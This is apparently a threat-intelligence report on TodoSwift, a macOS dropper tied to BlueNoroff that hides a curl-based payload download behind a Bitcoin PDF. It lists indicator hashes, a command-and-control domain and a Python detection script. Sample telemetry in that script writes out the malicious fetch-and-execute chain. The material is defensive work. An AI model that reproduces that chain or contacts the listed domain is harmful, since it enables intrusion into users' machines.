TodoSwift Disguises Malware Download Behind Bitcoin PDF
Aug. 19, 2024, 1:59 p.m.
Description
This report describes a macOS threat, likely of North Korean origin, delivered by a dropper application written in Swift/SwiftUI. The dropper shows the user a seemingly legitimate PDF of Bitcoin prices while, in the background, downloading and executing a malicious payload. Its tradecraft, including staging the download behind Google Drive URLs and passing command-and-control URLs to the binary as launch arguments, overlaps with earlier campaigns attributed to the DPRK-linked BlueNoroff group. The binary uses NSTask objects (the Foundation class exposed to Swift as Process) to launch curl, fetch files, and ultimately run a second-stage payload.
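The execution chain above (a SwiftUI app launched with a URL argument, spawning curl against a Google Drive URL, then running the downloaded file) is easy to hunt for in process telemetry. The following is an added detection example, not code from the report or its author. It runs over constructed JSON-lines process events that stand in for EDR/ESF data; the app name TodoTasks, the field names, and the Google Drive host list are assumptions, while the hashes and domain are the indicators listed on this page.

```python
"""Hunt for the TodoSwift dropper pattern in process-execution telemetry (added example)."""
import json
from urllib.parse import urlparse

# Indicators taken from the report: SHA-256 of the samples and the C2 domain.
IOC_SHA256 = {
    "f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93",
    "e09d2277a19dddd751edb164bde064682a6acc41a7ee178a2dacd4f9ac357fc7",
    "c52e3e73d7870bf8edc1b9ae52b26c08ef2466f948ef3446b2c865fd53d859dd",
    "a55029c963ff454e42483b9b6f0293dc546e06b2fb71e6ebaa4c6f146a9906a3",
    "9b839e9169babff1d14468d9f8497c165931dc65d5ff1f4b547925ff924c43fe",
    "9623c98f7338d56b07b35cd379e31e685e32a9c5317d7bc4af5276916cef4ed3",
}
IOC_DOMAINS = {"buy2x.com"}
# Assumption: the report says the payload is staged on Google Drive; these are
# the hosts such a download URL would carry in the curl arguments.
STAGING_HOSTS = {"drive.google.com", "docs.google.com"}

# Constructed sample telemetry (JSON lines), not captured data. The app name
# "TodoTasks" and the schema (ts, pid, ppid, exe, args, parent_exe, sha256)
# are hypothetical; adapt the field names to your EDR.
SAMPLE_EVENTS = """\
{"ts":"2024-08-19T13:00:01Z","pid":501,"ppid":1,"exe":"/Applications/TodoTasks.app/Contents/MacOS/TodoTasks","args":["/Applications/TodoTasks.app/Contents/MacOS/TodoTasks","https://buy2x.com/"],"parent_exe":"/sbin/launchd"}
{"ts":"2024-08-19T13:00:02Z","pid":502,"ppid":501,"exe":"/usr/bin/curl","args":["curl","-L","-o","/tmp/payload","https://drive.google.com/uc?export=download&id=FILEID"],"parent_exe":"/Applications/TodoTasks.app/Contents/MacOS/TodoTasks"}
{"ts":"2024-08-19T13:00:05Z","pid":503,"ppid":501,"exe":"/tmp/payload","args":["/tmp/payload"],"parent_exe":"/Applications/TodoTasks.app/Contents/MacOS/TodoTasks","sha256":"9b839e9169babff1d14468d9f8497c165931dc65d5ff1f4b547925ff924c43fe"}
{"ts":"2024-08-19T13:01:00Z","pid":600,"ppid":400,"exe":"/usr/bin/curl","args":["curl","-fsSL","https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh"],"parent_exe":"/bin/zsh"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def url_host(token):
    """Lower-cased host of an http(s) URL argument, or None if the token is not a URL."""
    if not token.startswith(("http://", "https://")):
        return None
    return (urlparse(token).hostname or "").lower() or None


def is_bundle_binary(path):
    """True for the main executable of a macOS .app bundle."""
    return "/Contents/MacOS/" in path


def classify(ev):
    """Return (score, reasons) for one process event; score 0 means nothing matched."""
    reasons = []
    args = ev.get("args", [])
    exe, parent = ev.get("exe", ""), ev.get("parent_exe", "")
    # URL-shaped arguments after argv[0]; the report notes C2 URLs passed as launch args.
    hosts = {h for h in (url_host(a) for a in args[1:]) if h}

    if ev.get("sha256") in IOC_SHA256:
        reasons.append("known TodoSwift sample hash")
    if hosts & IOC_DOMAINS:
        reasons.append("argument references known C2 domain")
    # curl started by a GUI app binary is the NSTask/Process download pattern.
    if exe.endswith("/curl") and is_bundle_binary(parent):
        reasons.append("curl spawned by app bundle binary")
        if hosts & STAGING_HOSTS:
            reasons.append("download from Google Drive staging host")
    if is_bundle_binary(exe) and hosts:
        reasons.append("app bundle launched with a URL argument")
    return len(reasons), reasons


def hunt(text, min_score=1):
    """Return [(pid, reasons)] for every event whose score reaches min_score."""
    hits = []
    for ev in parse_events(text):
        score, reasons = classify(ev)
        if score >= min_score:
            hits.append((ev["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

Raise `min_score` to 2 to suppress single-signal hits (a lone hash match or a lone curl-from-app event) and keep only events that combine a staging host or the C2 domain with the app-to-curl parent relationship; the hash set and domain list are the parts to refresh as new indicators are published.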
Date
Published: Aug. 19, 2024, 1:35 p.m.
Created: Aug. 19, 2024, 1:35 p.m.
Modified: Aug. 19, 2024, 1:59 p.m.
Indicators
f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93
e09d2277a19dddd751edb164bde064682a6acc41a7ee178a2dacd4f9ac357fc7
c52e3e73d7870bf8edc1b9ae52b26c08ef2466f948ef3446b2c865fd53d859dd
a55029c963ff454e42483b9b6f0293dc546e06b2fb71e6ebaa4c6f146a9906a3
9b839e9169babff1d14468d9f8497c165931dc65d5ff1f4b547925ff924c43fe
9623c98f7338d56b07b35cd379e31e685e32a9c5317d7bc4af5276916cef4ed3
buy2x.com
Attack Patterns
TodoSwift
KandyKorn
RustBucket
BlueNoroff
T1024
T1574
T1547
T1106
T1105
T1543
T1036
T1027
T1059